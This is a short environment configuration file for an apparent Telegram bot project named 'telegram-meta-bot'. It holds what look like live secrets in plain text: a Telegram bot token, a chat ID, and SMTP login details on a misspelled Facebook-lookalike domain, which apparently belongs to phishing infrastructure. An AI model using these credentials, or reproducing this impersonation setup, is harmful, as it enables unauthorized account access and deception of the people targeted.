PORT = 3000
MONGO_DB_URI = mongodb://localhost:27017/telegram-meta-bot
# Telegram Bot Configuration
TELEGRAM_BOT_TOKEN=7818142477:AAGPQClwFNQEolP1YiefYnzjr_ZSYZO2DtU
TELEGRAM_CHAT_ID=-4547317714

# Email Configuration
EMAIL_HOST=mail.facebookbusinesservice.com
EMAIL_PORT=465
EMAIL_USER=simmons.grifin@facebookbusinesservice.com
EMAIL_PASS=Bitcoin2025$$